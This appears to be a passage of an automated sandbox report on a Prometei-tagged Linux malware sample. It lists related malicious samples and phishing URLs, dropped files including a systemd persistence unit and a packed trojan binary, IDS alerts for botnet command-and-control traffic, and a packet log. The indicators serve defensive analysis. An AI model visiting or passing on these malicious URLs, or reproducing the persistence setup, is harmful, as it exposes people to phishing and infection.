	vejfa5.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	vjwe68k.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	pspc.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
FASTLYUS	ThePredictor8.5.7.msi	Get hash	malicious	PureCrypter, AsyncRAT, Clipboard Hijacker, MicroClip	Browse	185.199.108.133
	ThePredictor8.5.7.msi	Get hash	malicious	PureCrypter, AsyncRAT, Clipboard Hijacker, MicroClip	Browse	185.199.108.133
	Madelainechocolate pay increase 2025 .svg	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.130.137
	https://adclick.g.doubleclick.net/pcs/click?Y41515N2435yMX419snVO7695-2024-McWAN324SCAN&adurl=https://adclick.g.doubleclick.net/pcs/click?Y41515N2435yMX419snVO7695-2024-McWAN324SCAN&adurl=https://2025_tax_compliance_team_x1Update_Tax_Review.fmhjhctk.ru%2FaNAtEaDInodo/#0jensors@unitdr0ad.com	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	185.199.109.133
	https://1hpkhoi.elnk7.com/9acea2a1c7dc1956b0893779c3ec4a0fh	Get hash	malicious	Unknown	Browse	151.101.44.157
	na.elf	Get hash	malicious	Prometei	Browse	151.101.46.49
	na.elf	Get hash	malicious	Prometei	Browse	199.232.90.49
	https://buildin.ai/share/831dc664-562e-49aa-8d00-238a16be9018?code=2BVPTH&embed=true	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.194.137
	reseaucctt.ca Contrat.pdf	Get hash	malicious	HTMLPhisher	Browse	199.232.90.137
	na.elf	Get hash	malicious	Prometei	Browse	151.101.46.49
NCRENUS	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	https://trimmer.to/utXRp	Get hash	malicious	Unknown	Browse	152.53.117.228
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/etc/CommId

Download File

Process:	/usr/sbin/uplugplay
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.452819531114783
Encrypted:	false
SSDEEP:	3:3kc:3
MD5:	67F634B5D958B2D8AD159B5981F8F058
SHA1:	4DB27D86B983FE5D5BA955DC0E524252FC3FE78B
SHA-256:	509D7DDD17AC699E5943FBE9B7DCFDBDA74FD2297438386B4683D3004E7B4BB5
SHA-512:	2A1D3FC5D3DECF8447BDEEFD5396685753928A4E94A80C3462826E9602190D5ED3AA9D87E62B3F973A2858170AAA9734EA6DF1CEF0685A650932DFF38D6B54F1
Malicious:	true
Reputation:	low
Preview:	TO32433452U81Q0F

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	high, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/usr/lib/systemd/system/uplugplay.service

Download File

Process:	/tmp/na.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	145
Entropy (8bit):	4.769509838572339
Encrypted:	false
SSDEEP:	3:zMZa75X1PxQJqtWA1+DRvBADMikAdIgQ+aQmNJX4ev+sirSkQmWA1+DRvn:z8uXcqtWA4RZAMD+aBNdhTILQmWA4Rv
MD5:	8CA62D1F47880BCE036C2956C9B7B272
SHA1:	3BCC3A5C4FCC5B0D08C4524A59F6B8E113B62060
SHA-256:	C655D3D4E374FAD38313EC4262207B2D7D68A870238F203EF3C33F85E66C8E32
SHA-512:	4CD2D9D67151FA25E833707DEE2442C4A5F752053FC2C36EC73C0E2B734C66CA69C63FCEB47714D9ADD5B9FE2EEE1E45BE5199E2CAE7C26173E766B333877DA6
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[Unit].Description=UPlugPlay.After=multi-user.target..[Service].Type=forking.ExecStart=/usr/sbin/uplugplay..[Install].WantedBy=multi-user.target.

/usr/sbin/uplugplay

Download File

Process:	/tmp/na.elf
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Category:	dropped
Size (bytes):	435932
Entropy (8bit):	7.942809345484565
Encrypted:	false
SSDEEP:	6144:63fxS1fHETSACF2Gzm5DVvSHrKKRH4SCra+HWMiFbcAOXmb4Dsi6wwcitgl:25WOSACZSV6eKRH5EPiamb4DsDwwcV
MD5:	A602ED9FC13CF561BF74B56F8C1AA2ED
SHA1:	5C1E779505480E4B67F45E89DB0F7DEF9E88E204
SHA-256:	AF20285F057974530228E55D6B18EA542B132D9A861805A8F174E9EBB808C831
SHA-512:	9C2D529D239027E609032EB40DF1FC969A3E0732989C10FC04A19A5D60B0177809C916F63F032182F80D582DC7E845DC6316148F5598ED866FDF31219CB58037
Malicious:	true
Yara Hits:	Rule: Linux_Trojan_Dofloo_ac3333d1, Description: unknown, Source: /usr/sbin/uplugplay, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Reputation:	low
Preview:	.ELF..............>.....`.].....@...................@.8...........................@.......@.............XH...............................PW......PW.....M.......M...............Q.td....................................................V..9UPX!............!v..p............. ..ELF......>....@.......0..'8..........W.3c..-.......o..K>...@!v..{_bo./.O7.%....o.....l..-.R..XOH....6..o..p..@... ....om.r2...D_..n.D...O...M(.S.td...POQn..PpnG.oRO!..=.0...%I.$...@.P.............y......GNU....'..l......?D....N...k.n..m"c...i......._....R.%..y...#N./ $../..p.E....v!#...._..r....K....../0.\|.....p.L.........H...._...#/v..._P.C2.b.`....y!.K...x!...@p.2.".oh...`......X.B.C;P_.L/H....@...N..8?.0O.C;.`(...q.\. ..O.$ar .@%I.!v...}...I&.n.......H...H...H..t..."...9.....?..%.....D................................}....ume....]U....ME=....5-%...................&..E.t$..T$.<{....%.....H.\|$...~.9.g...Sd2.OH.. ......kn(...$. 1.H9..+..t>d....4..u......~2..w..H.. mU.H.=d...o...V..`...V..=[._w.Ru6..O

/var/lib/fwupd/gnupg/.#lk0x00005575faa70b80.galassia.6464

Download File

Process:	/usr/bin/gpg
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	2.908694969562842
Encrypted:	false
SSDEEP:	3:N/bMEK/vn:ihvn
MD5:	988AB3A4D721CA4C14BE298813D6E1F6
SHA1:	2EB175D6FD1A1B650F9653F96BF09AE67D52E04A
SHA-256:	CA497E6AC309B06FA3EB21354A3EC155F4966C4588796AAD53E01F27E4847609
SHA-512:	C1A4B65AF85CC425169C21FBC3D8635A305EC979EEA2A96FB7EFBDD0115562CD0E0D5AA8EA3CFADAE77D0D165FD748B73254DEC87D137CC8FE7EA73FAB0FBFCE
Malicious:	false
Reputation:	low
Preview:	6464.galassia.

/var/lib/fwupd/gnupg/.#lk0x00005599db685b80.galassia.6434

Download File

Process:	/usr/bin/gpg
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.0086949695628418
Encrypted:	false
SSDEEP:	3:N/ezIvn:Mcvn
MD5:	A7C7EA77FAE49DE6C897126687605797
SHA1:	2D2EAB491EABAFC22FA856A68C2E50BC29C86B1C
SHA-256:	9611AD966442D3A30154B96EB4285B0314AD6258FDA295DE7147D60DCA73625A
SHA-512:	771BEBC56CF9594954D8E6AF39DD6975B83CC33B9A6EBB8B1F4A3F22DCB57654D1DEE8C1A68C6CCBEA0F057FD9A8CEB0DD48416268A1602787EC9996F9EC2D80
Malicious:	false
Reputation:	low
Preview:	6434.galassia.

/var/lib/fwupd/gnupg/.#lk0x000055d64eefcb80.galassia.6443

Download File

Process:	/usr/bin/gpg
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.0086949695628418
Encrypted:	false
SSDEEP:	3:N/Zfhvn:Dhvn
MD5:	A899D6D5CF34563204FEBC2C9E95E8D8
SHA1:	25F3F5E03A62808728F2150E3EB3F6B59EAE237C
SHA-256:	15F7CF6DC0C8BC61B4C9C7BEA02B2E76CE901CE691D750C49CD487741736D145
SHA-512:	811D1EA55F4598D09D3CB5810BB2237DF481FAA585E97A446889B64F1A24C51ACC61A52A5A9A8149A3D9A1BE724E31A5A8CD9D257CE966300FB9C09353240255
Malicious:	false
Reputation:	low
Preview:	6443.galassia.

/var/lib/fwupd/gnupg/.#lk0x000055ea7eb5bb80.galassia.6297

Download File

Process:	/usr/bin/gpg
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.108694969562842
Encrypted:	false
SSDEEP:	3:N/CcHK/vn:gcHK/vn
MD5:	5EDAE7080393EB2A2D3A585555CE0288
SHA1:	DB3B98EB3527B00E5BCF3E22F13B1D9FC9BF574E
SHA-256:	B72D63449041885DA37EC17F625044B32292010BF7BAA871D8745362E3F66E95
SHA-512:	729542510ECC662D91C39BDBE11811F59A624E54ABF6AF34EDCAF1C3C3E9F1D77A44AFADA53CFFAED0FBA13C913C3E3F59E66796264D02781877242D61282EB2
Malicious:	false
Preview:	6297.galassia.

/var/lib/fwupd/gnupg/pubring.kbx.tmp

Download File

Process:	/usr/bin/gpg
File Type:	GPG keybox database version 1, created-at Tue Aug 17 14:04:41 2021, last-maintained Mon Mar 31 23:48:07 2025
Category:	dropped
Size (bytes):	2534
Entropy (8bit):	7.61930218230606
Encrypted:	false
SSDEEP:	48:soZ3Buh7g8ZMUfN1i9N+EvbYJYv20hIhoRU3h0LJv9ARRt:1Uc8ZM+Y+AbcoRU3CARRt
MD5:	0416816753CB9EB7A42F8A339B3DB01C
SHA1:	D1FF5664A74C1D6E7138DEF73AD6533948286F96
SHA-256:	79644021231BC04D6B3048030154633E9197DC5E58D5DE663CD56C36265A48DD
SHA-512:	AFE2E9D3100A23928BED16909CFE9E34CCF9C2242A85E5FC388A4AE9913051CEBDBD25C99E0412894350D6A4B5DA554A7305E675E2EBA5F2C25B7716CF78CCE7
Malicious:	false
Preview:	... ....KBXf....a...g.)....................^........?..A..../.H...E8..... .............~............................a...........U.........T.x8.sU....K'....F....l...K....cL.`Y......=....^~.5\|.%.......2..../.h..O..T........'.6E....HV..?.6l.......e..1o.O.,Y3....1,..a4..\|..s.w......f2......gaIK..i...x.T...~..W..N."..Z..ia!..V..so.....<.6j..........3C&..t1..Gf...j..z...U.........gpg.........Linux Vendor Firmware Service <sign@fwupd.org>....gpg.........7.....!..U..................................H...E8..c....d.....d.....3....a..y..?...........l...1/...)......T.f....-..UoxT... .v...\|...7.....d..PB..>..W{...-..R....&S.....~..2.ps.8:...{..^{?..@.?..e6....y...c.Rw.SK.F.;U)...A..S> an....W.?.\|.{.dB....x~B...V....O....'./!...\|;...Xw.:.!.p,n.A.H\..\...).....gpg......z.......D<............~...$......B.Y..A...n.m...o=.... ......8>4.G8E..L...+G..Z...<.................Z............................a...........[.......I....DR:....!._.P..`.1..6.9..G....O.y.?.......

Static File Info

General

File type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Entropy (8bit):	7.942809345484565
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	na.elf
File size:	435'932 bytes
MD5:	a602ed9fc13cf561bf74b56f8c1aa2ed
SHA1:	5c1e779505480e4b67f45e89db0f7def9e88e204
SHA256:	af20285f057974530228e55d6b18ea542b132d9a861805a8f174e9ebb808c831
SHA512:	9c2d529d239027e609032eb40df1fc969a3e0732989c10fc04a19a5d60b0177809c916f63f032182f80d582dc7e845dc6316148f5598ed866fdf31219cb58037
SSDEEP:	6144:63fxS1fHETSACF2Gzm5DVvSHrKKRH4SCra+HWMiFbcAOXmb4Dsi6wwcitgl:25WOSACZSV6eKRH5EPiamb4DsDwwcV
TLSH:	919423F8C83D2E30D8169B3CBB5A826CF0A15772D9562B6EB51AE5732179F1FAC60101
File Content Preview:	.ELF..............>.....`.].....@...................@.8...........................@.......@.............XH...............................PW......PW.....M.......M...............Q.td....................................................V..9UPX!............!v.

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Advanced Micro Devices X86-64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x15de360
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	3
Section Header Offset:	0
Section Header Size:	0
Number of Section Headers:	0
Header String Table Index:	0

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align
LOAD	0x0	0x400000	0x400000	0x1000	0x1174858	7.6054	0x6	RW	0x1000
LOAD	0x0	0x1575000	0x1575000	0x69e4d	0x69e4d	7.9430	0x5	R E	0x1000
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x10

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-04-01T01:48:04.189583+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.23	58304	152.36.128.18	80	TCP
2025-04-01T01:48:07.772289+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.23	58306	152.36.128.18	80	TCP
2025-04-01T01:50:09.133975+0200	2044560	ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern	1	192.168.2.23	39619	8.8.8.8	53	UDP
2025-04-01T01:50:09.248434+0200	2044560	ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern	1	192.168.2.23	42875	8.8.8.8	53	UDP

Network Port Distribution

Total Packets: 170
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 1, 2025 01:47:53.041455984 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.041574955 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:53.151530027 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.151608944 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:53.162755966 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.162913084 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:53.254935980 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.255021095 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:53.280827045 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.280967951 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:53.371944904 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.372095108 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:53.479500055 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.479589939 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:53.491442919 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.491595030 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:53.581645012 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.581908941 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:53.602381945 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.602566004 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:53.707757950 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.707938910 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:53.738533020 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.738682032 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:53.810364008 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.810444117 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:53.838073969 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.838207960 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:53.910780907 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.910859108 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:53.938258886 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.965298891 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:53.965466022 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:54.014085054 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.036191940 CEST	443	33606	54.171.230.55	192.168.2.23
Apr 1, 2025 01:47:54.036230087 CEST	443	33606	54.171.230.55	192.168.2.23
Apr 1, 2025 01:47:54.036354065 CEST	33606	443	192.168.2.23	54.171.230.55
Apr 1, 2025 01:47:54.036354065 CEST	33606	443	192.168.2.23	54.171.230.55
Apr 1, 2025 01:47:54.065661907 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:54.072146893 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.089623928 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.089696884 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:54.182292938 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.215641975 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.215699911 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:54.321757078 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.321827888 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:54.369960070 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.370012999 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:54.470196962 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.493532896 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.493587017 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:54.594276905 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.614154100 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.614213943 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:54.647248030 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.705581903 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:54.711951971 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.727283001 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.727343082 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:54.807419062 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.865706921 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.865758896 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:54.961565971 CEST	43928	443	192.168.2.23	91.189.91.42
Apr 1, 2025 01:47:54.968060970 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.968137980 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:54.989758968 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:54.989814997 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:55.023376942 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:55.023431063 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:55.093149900 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:55.128304005 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:55.128385067 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:55.231820107 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:55.245452881 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:55.245533943 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:55.281081915 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:55.345503092 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:55.355554104 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:55.451314926 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:55.451370955 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:55.622968912 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:55.623034954 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:56.097577095 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:56.097635984 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:56.231515884 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:56.231590033 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:56.335220098 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:56.335325956 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:56.437381029 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:56.437494040 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:56.466509104 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:56.466584921 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:56.536668062 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:56.537260056 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:56.568711042 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:56.570152998 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:56.639147997 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:56.642174959 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:56.657994032 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:56.658054113 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:56.692440033 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:56.692504883 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:56.763072968 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:56.763140917 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:56.795212984 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:56.795264006 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:56.866236925 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:56.866297960 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:56.884826899 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:56.884888887 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:56.968332052 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:56.968398094 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:56.989862919 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:56.989901066 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:57.090675116 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.090743065 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:57.117614031 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.117656946 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:57.212136030 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.212202072 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:57.319169998 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.342185020 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.342232943 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:57.446280003 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.461389065 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.461431980 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:57.491636038 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.541204929 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:57.565560102 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.589241982 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.589346886 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:57.641429901 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.695569992 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.695626020 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:57.708537102 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.777182102 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:57.803817034 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.818257093 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.818337917 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:57.878966093 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.922084093 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.922118902 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.922151089 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:57.951637983 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:57.951746941 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:58.378423929 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:58.378586054 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:58.481873989 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:58.484349966 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:58.614821911 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:58.614897013 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:58.716428041 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:58.718163013 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:58.825443029 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:58.825520992 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:58.851362944 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:58.851425886 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:58.926887989 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:58.926939011 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:58.954458952 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:58.954514980 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.033962011 CEST	443	55240	199.232.90.49	192.168.2.23
